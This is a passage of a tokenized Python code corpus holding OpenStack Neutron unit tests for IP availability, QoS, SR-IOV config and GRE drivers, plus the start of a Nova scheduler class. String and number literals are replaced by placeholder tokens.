expect_val , actual_val ) <EOL> def test_attr_info_without_conversion ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { '<STR_LIT:foo>' : { '<STR_LIT:key>' : '<STR_LIT>' } } <EOL> expect_val = { '<STR_LIT:foo>' : [ '<STR_LIT:4>' ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertEqual ( expect_val , actual_val ) <EOL> def test_attr_info_with_convert_list_to ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { <EOL> '<STR_LIT:foo>' : { <EOL> '<STR_LIT>' : converters . convert_kvp_list_to_dict , <EOL> } <EOL> } <EOL> expect_val = { '<STR_LIT:foo>' : { '<STR_LIT:key>' : [ '<STR_LIT:2>' , '<STR_LIT:4>' ] } , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertOrderedEqual ( expect_val , actual_val ) <EOL> def test_attr_info_with_convert_to ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> attr_info = { '<STR_LIT:foo>' : { '<STR_LIT>' : converters . convert_to_int } } <EOL> expect_val = { '<STR_LIT:foo>' : [ <NUM_LIT:4> ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , attr_info ) <EOL> self . assertEqual ( expect_val , actual_val ) <EOL> class CreateResourceTestCase ( base . BaseTestCase ) : <EOL> def test_resource_creation ( self ) : <EOL> resource = v2_base . create_resource ( '<STR_LIT>' , '<STR_LIT>' , None , { } ) <EOL> self . assertIsInstance ( resource , webob . dec . wsgify ) </s>
<s> import neutron . api . extensions as api_ext <EOL> import neutron . common . config as config <EOL> import neutron . common . constants as constants <EOL> import neutron . extensions <EOL> import neutron . services . network_ip_availability . plugin as plugin_module <EOL> import neutron . tests . unit . db . test_db_base_plugin_v2 as test_db_base_plugin_v2 <EOL> API_RESOURCE = '<STR_LIT>' <EOL> IP_AVAIL_KEY = '<STR_LIT>' <EOL> IP_AVAILS_KEY = '<STR_LIT>' <EOL> EXTENSIONS_PATH = '<STR_LIT::>' . join ( neutron . extensions . __path__ ) <EOL> PLUGIN_NAME = '<STR_LIT>' % ( plugin_module . NetworkIPAvailabilityPlugin . __module__ , <EOL> plugin_module . NetworkIPAvailabilityPlugin . __name__ ) <EOL> class TestNetworkIPAvailabilityAPI ( <EOL> test_db_base_plugin_v2 . NeutronDbPluginV2TestCase ) : <EOL> def setUp ( self ) : <EOL> svc_plugins = { '<STR_LIT>' : PLUGIN_NAME } <EOL> super ( TestNetworkIPAvailabilityAPI , self ) . setUp ( <EOL> service_plugins = svc_plugins ) <EOL> self . plugin = plugin_module . NetworkIPAvailabilityPlugin ( ) <EOL> ext_mgr = api_ext . PluginAwareExtensionManager ( <EOL> EXTENSIONS_PATH , { "<STR_LIT>" : self . plugin } <EOL> ) <EOL> app = config . load_paste_app ( '<STR_LIT>' ) <EOL> self . ext_api = api_ext . ExtensionMiddleware ( app , ext_mgr = ext_mgr ) <EOL> def _validate_availability ( self , network , availability , expected_used_ips , <EOL> expected_total_ips = <NUM_LIT> ) : <EOL> self . assertEqual ( network [ '<STR_LIT:name>' ] , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( network [ '<STR_LIT:id>' ] , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_used_ips , availability [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_total_ips , availability [ '<STR_LIT>' ] ) <EOL> def _validate_from_availabilities ( self , availabilities , wrapped_network , <EOL> expected_used_ips , <EOL> expected_total_ips = <NUM_LIT> ) : <EOL> network = wrapped_network [ '<STR_LIT>' ] <EOL> availability = self . _find_availability ( availabilities , network [ '<STR_LIT:id>' ] ) <EOL> self . assertIsNotNone ( availability ) <EOL> self . _validate_availability ( network , availability , <EOL> expected_used_ips = expected_used_ips , <EOL> expected_total_ips = expected_total_ips ) <EOL> @ staticmethod <EOL> def _find_availability ( availabilities , net_id ) : <EOL> for ip_availability in availabilities : <EOL> if net_id == ip_availability [ '<STR_LIT>' ] : <EOL> return ip_availability <EOL> def test_basic ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> network = net [ '<STR_LIT>' ] <EOL> request = self . new_list_request ( API_RESOURCE , self . fmt ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> request = self . new_show_request ( API_RESOURCE , network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> usage = response [ IP_AVAIL_KEY ] <EOL> self . _validate_availability ( network , usage , <NUM_LIT:0> ) <EOL> def test_usages_multi_nets_subnets ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as n1 , self . network ( name = '<STR_LIT>' ) as n2 , self . network ( name = '<STR_LIT>' ) as n3 : <EOL> with self . subnet ( network = n1 ) as subnet1_1 , self . subnet ( cidr = '<STR_LIT>' , network = n3 ) as subnet3_1 : <EOL> with self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet3_1 ) , self . port ( subnet = subnet3_1 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> data = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( data , n1 , <NUM_LIT:3> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( data , n2 , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _validate_from_availabilities ( data , n3 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> network = n1 [ '<STR_LIT>' ] <EOL> request = self . new_show_request ( API_RESOURCE , <EOL> network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> self . _validate_availability ( network , <EOL> response [ IP_AVAIL_KEY ] , <NUM_LIT:3> , <NUM_LIT> ) <EOL> def test_usages_multi_nets_subnets_sums ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as n1 : <EOL> with self . subnet ( network = n1 ) as subnet1_1 , self . subnet ( cidr = '<STR_LIT>' , network = n1 ) as subnet1_2 : <EOL> with self . port ( subnet = subnet1_1 ) , self . port ( subnet = subnet1_2 ) , self . port ( subnet = subnet1_2 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> n1 , <NUM_LIT:3> , <NUM_LIT> ) <EOL> network = n1 [ '<STR_LIT>' ] <EOL> request = self . new_show_request ( API_RESOURCE , <EOL> network [ '<STR_LIT:id>' ] ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAIL_KEY , response ) <EOL> self . _validate_availability ( network , <EOL> response [ IP_AVAIL_KEY ] , <NUM_LIT:3> , <NUM_LIT> ) <EOL> def test_usages_port_consumed_v4 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) as subnet : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> with self . port ( subnet = subnet ) , self . port ( subnet = subnet ) : <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( <EOL> self . ext_api ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:2> ) <EOL> def test_usages_query_ip_version_v4 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_ip_version_v6 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( <EOL> network = net , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> , <EOL> ipv6_address_mode = constants . DHCPV6_STATELESS ) : <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( <EOL> response [ IP_AVAILS_KEY ] , net , <NUM_LIT:0> , <NUM_LIT> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_ports_consumed_v6 ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( <EOL> network = net , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> , <EOL> ipv6_address_mode = constants . DHCPV6_STATELESS ) as subnet : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> with self . port ( subnet = subnet ) , self . port ( subnet = subnet ) , self . port ( subnet = subnet ) : <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:3> , <EOL> <NUM_LIT> ) <EOL> def test_usages_query_network_id ( self ) : <EOL> with self . network ( ) as net : <EOL> with self . subnet ( network = net ) : <EOL> network = net [ '<STR_LIT>' ] <EOL> test_id = network [ '<STR_LIT:id>' ] <EOL> params = '<STR_LIT>' % test_id <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_network_name ( self ) : <EOL> test_name = '<STR_LIT>' <EOL> with self . network ( name = test_name ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' % test_name <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_query_tenant_id ( self ) : <EOL> test_tenant_id = '<STR_LIT>' <EOL> with self . network ( tenant_id = test_tenant_id ) as net : <EOL> with self . subnet ( network = net ) : <EOL> params = '<STR_LIT>' % test_tenant_id <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertIn ( IP_AVAILS_KEY , response ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> self . _validate_from_availabilities ( response [ IP_AVAILS_KEY ] , <EOL> net , <NUM_LIT:0> ) <EOL> for net_avail in response [ IP_AVAILS_KEY ] : <EOL> self . assertEqual ( test_tenant_id , net_avail [ '<STR_LIT>' ] ) <EOL> params = '<STR_LIT>' <EOL> request = self . new_list_request ( API_RESOURCE , params = params ) <EOL> response = self . deserialize ( self . fmt , <EOL> request . get_response ( self . ext_api ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( response [ IP_AVAILS_KEY ] ) ) <EOL> def test_usages_multi_net_multi_subnet_46 ( self ) : <EOL> with self . network ( name = '<STR_LIT>' ) as net_v6_1 , self . network ( name = '<STR_LIT>' ) as net_v6_2 , self . network ( name = '<STR_LIT>' ) as net_v4_1 , self . network ( name = '<STR_LIT>' ) as net_v4_2 : <EOL> with self . subnet ( network = net_v6_1 , cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> ) as s61 , self . subnet ( network = net_v6_2 , <EOL> cidr = '<STR_LIT>' , <EOL> ip_version = <NUM_LIT:6> ) as s62 , self . subnet ( network = net_v4_1 , cidr = '<STR_LIT>' ) as s41 , self . subnet ( network = net_v4_2 , cidr = '<STR_LIT>' ) as s42 : <EOL> with self . port ( subnet = s61 ) , self . port ( subnet = s62 ) , self . port ( subnet = s62 ) , self . port ( subnet = s41 ) , self . port ( subnet = s42 ) , self . port ( subnet = s42 ) : <EOL> request = self . new_list_request ( API_RESOURCE ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> avails_list = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_1 , <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_1 , <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> for ip_ver in [ <NUM_LIT:4> , <NUM_LIT:6> ] : <EOL> params = '<STR_LIT>' % ip_ver <EOL> request = self . new_list_request ( API_RESOURCE , <EOL> params = params ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> for net_avail in response [ IP_AVAILS_KEY ] : <EOL> for sub in net_avail [ '<STR_LIT>' ] : <EOL> self . assertEqual ( ip_ver , sub [ '<STR_LIT>' ] ) <EOL> request = self . new_list_request ( <EOL> API_RESOURCE , <EOL> params = '<STR_LIT>' <EOL> % ( net_v4_2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> net_v6_2 [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> response = self . deserialize ( <EOL> self . fmt , request . get_response ( self . ext_api ) ) <EOL> avails_list = response [ IP_AVAILS_KEY ] <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v6_2 , <NUM_LIT:2> , <NUM_LIT> ) <EOL> self . _validate_from_availabilities ( <EOL> avails_list , net_v4_2 , <NUM_LIT:2> , <NUM_LIT> ) </s>
<s> import mock <EOL> from neutron import manager <EOL> from neutron . objects . qos import rule_type <EOL> from neutron . services . qos import qos_consts <EOL> from neutron . tests import base as test_base <EOL> DB_PLUGIN_KLASS = '<STR_LIT>' <EOL> class QosRuleTypeObjectTestCase ( test_base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( DB_PLUGIN_KLASS ) <EOL> super ( QosRuleTypeObjectTestCase , self ) . setUp ( ) <EOL> def test_get_objects ( self ) : <EOL> core_plugin = manager . NeutronManager . get_plugin ( ) <EOL> rule_types_mock = mock . PropertyMock ( <EOL> return_value = qos_consts . VALID_RULE_TYPES ) <EOL> with mock . patch . object ( core_plugin , '<STR_LIT>' , <EOL> new_callable = rule_types_mock , <EOL> create = True ) : <EOL> types = rule_type . QosRuleType . get_objects ( ) <EOL> self . assertEqual ( sorted ( qos_consts . VALID_RULE_TYPES ) , <EOL> sorted ( type_ [ '<STR_LIT:type>' ] for type_ in types ) ) <EOL> def test_wrong_type ( self ) : <EOL> self . assertRaises ( ValueError , rule_type . QosRuleType , type = '<STR_LIT>' ) </s>
<s> from oslo_config import cfg <EOL> from neutron . common import utils as n_utils <EOL> from neutron . plugins . ml2 . drivers . mech_sriov . agent . common import config <EOL> from neutron . plugins . ml2 . drivers . mech_sriov . agent import sriov_nic_agent as agent <EOL> from neutron . tests import base <EOL> class TestSriovAgentConfig ( base . BaseTestCase ) : <EOL> EXCLUDE_DEVICES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_LIST_INVALID = [ '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_WITH_SPACES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES_WITH_SPACES_ERROR = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> EXCLUDE_DEVICES = { '<STR_LIT>' : set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : set ( [ '<STR_LIT>' ] ) } <EOL> DEVICE_MAPPING_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING_WITH_ERROR_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING_WITH_SPACES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def test_defaults ( self ) : <EOL> self . assertEqual ( config . DEFAULT_DEVICE_MAPPINGS , <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings ) <EOL> self . assertEqual ( config . DEFAULT_EXCLUDE_DEVICES , <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( <NUM_LIT:2> , <EOL> cfg . CONF . AGENT . polling_interval ) <EOL> def test_device_mappings ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> device_mappings = n_utils . parse_mappings ( <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , unique_keys = False ) <EOL> self . assertEqual ( self . DEVICE_MAPPING , device_mappings ) <EOL> def test_device_mappings_with_error ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_WITH_ERROR_LIST , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , n_utils . parse_mappings , <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , <EOL> unique_keys = False ) <EOL> def test_device_mappings_with_spaces ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_WITH_SPACES_LIST , <EOL> '<STR_LIT>' ) <EOL> device_mappings = n_utils . parse_mappings ( <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , unique_keys = False ) <EOL> self . assertEqual ( self . DEVICE_MAPPING , device_mappings ) <EOL> def test_exclude_devices ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST , <EOL> '<STR_LIT>' ) <EOL> exclude_devices = config . parse_exclude_devices ( <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> def test_exclude_devices_with_spaces ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_WITH_SPACES_LIST , <EOL> '<STR_LIT>' ) <EOL> exclude_devices = config . parse_exclude_devices ( <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> def test_exclude_devices_with_error ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_WITH_SPACES_ERROR , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , config . parse_exclude_devices , <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> def test_validate_config_ok ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST , <EOL> '<STR_LIT>' ) <EOL> config_parser = agent . SriovNicAgentConfigParser ( ) <EOL> config_parser . parse ( ) <EOL> device_mappings = config_parser . device_mappings <EOL> exclude_devices = config_parser . exclude_devices <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> self . assertEqual ( self . DEVICE_MAPPING , device_mappings ) <EOL> def test_validate_config_fail ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST_INVALID , <EOL> '<STR_LIT>' ) <EOL> config_parser = agent . SriovNicAgentConfigParser ( ) <EOL> self . assertRaises ( ValueError , config_parser . parse ) </s>
<s> from neutron . plugins . common import constants as p_const <EOL> from neutron . plugins . ml2 import config <EOL> from neutron . plugins . ml2 . drivers import type_gre <EOL> from neutron . tests . unit . plugins . ml2 . drivers import base_type_tunnel <EOL> from neutron . tests . unit . plugins . ml2 import test_rpc <EOL> from neutron . tests . unit import testlib_api <EOL> TUNNEL_IP_ONE = "<STR_LIT>" <EOL> TUNNEL_IP_TWO = "<STR_LIT>" <EOL> HOST_ONE = '<STR_LIT>' <EOL> HOST_TWO = '<STR_LIT>' <EOL> def _add_allocation ( session , gre_id , allocated = False ) : <EOL> allocation = type_gre . GreAllocation ( gre_id = gre_id , allocated = allocated ) <EOL> allocation . save ( session ) <EOL> def _get_allocation ( session , gre_id ) : <EOL> return session . query ( type_gre . GreAllocation ) . filter_by ( <EOL> gre_id = gre_id ) . one ( ) <EOL> class GreTypeTest ( base_type_tunnel . TunnelTypeTestMixin , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_MODULE = type_gre <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> TYPE = p_const . TYPE_GRE <EOL> def test_get_endpoints ( self ) : <EOL> self . add_endpoint ( ) <EOL> self . add_endpoint ( <EOL> base_type_tunnel . TUNNEL_IP_TWO , base_type_tunnel . HOST_TWO ) <EOL> endpoints = self . driver . get_endpoints ( ) <EOL> for endpoint in endpoints : <EOL> if endpoint [ '<STR_LIT>' ] == base_type_tunnel . TUNNEL_IP_ONE : <EOL> self . assertEqual ( base_type_tunnel . HOST_ONE , endpoint [ '<STR_LIT:host>' ] ) <EOL> elif endpoint [ '<STR_LIT>' ] == base_type_tunnel . TUNNEL_IP_TWO : <EOL> self . assertEqual ( base_type_tunnel . HOST_TWO , endpoint [ '<STR_LIT:host>' ] ) <EOL> def test_get_mtu ( self ) : <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { } <EOL> self . assertEqual ( <NUM_LIT:0> , self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> class GreTypeMultiRangeTest ( base_type_tunnel . TunnelTypeMultiRangeTestMixin , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> class GreTypeRpcCallbackTest ( base_type_tunnel . TunnelRpcCallbackTestMixin , <EOL> test_rpc . RpcCallbacksTestCase , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> TYPE = p_const . TYPE_GRE </s>
<s> import mock <EOL> from neutron . api . rpc . callbacks . consumer import registry as cons_registry <EOL> from neutron . api . rpc . callbacks . producer import registry as prod_registry <EOL> from neutron . api . rpc . callbacks import resource_manager <EOL> from neutron . tests . unit import testlib_api <EOL> class BaseQosTestCase ( testlib_api . SqlTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BaseQosTestCase , self ) . setUp ( ) <EOL> with mock . patch . object ( <EOL> resource_manager . ResourceCallbacksManager , '<STR_LIT>' , <EOL> new_callable = mock . PropertyMock ( return_value = False ) ) : <EOL> self . cons_mgr = resource_manager . ConsumerResourceCallbacksManager ( ) <EOL> self . prod_mgr = resource_manager . ProducerResourceCallbacksManager ( ) <EOL> for mgr in ( self . cons_mgr , self . prod_mgr ) : <EOL> mgr . clear ( ) <EOL> mock . patch . object ( <EOL> cons_registry , '<STR_LIT>' , return_value = self . cons_mgr ) . start ( ) <EOL> mock . patch . object ( <EOL> prod_registry , '<STR_LIT>' , return_value = self . prod_mgr ) . start ( ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from nova . scheduler import filter_scheduler <EOL> from nova . scheduler import weights <EOL> CONF = cfg . CONF <EOL> LOG = logging . getLogger ( __name__ ) <EOL> solver_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF . register_opts ( solver_opts , group = '<STR_LIT>' ) <EOL> class ConstraintSolverScheduler ( filter_scheduler . FilterScheduler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ConstraintSolverScheduler , self ) . __init__ ( * args , ** kwargs ) <EOL> self . hosts_solver = importutils . import_object ( <EOL> CONF . solver_scheduler . scheduler_host_solver ) <EOL> def _schedule ( self , context , request_spec , filter_properties ) : <EOL> """<STR_LIT>""" <EOL> instance_type = request_spec . get ( "<STR_LIT>" , None ) <EOL> instance_uuids = request_spec . get ( "<STR_LIT>" , None ) <EOL> config_options = self . _get_configuration_options ( ) <EOL> if instance_uuids : <EOL> num_instances = len ( instance_uuids ) <EOL> else : <EOL> num_instances = request_spec . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> solver_cache = { } <EOL> filter_properties . update ( { '<STR_LIT>' : context , <EOL> '<STR_LIT>' : request_spec , <EOL> '<STR_LIT>' : config_options , <EOL> '<STR_LIT>' : instance_type , <EOL> 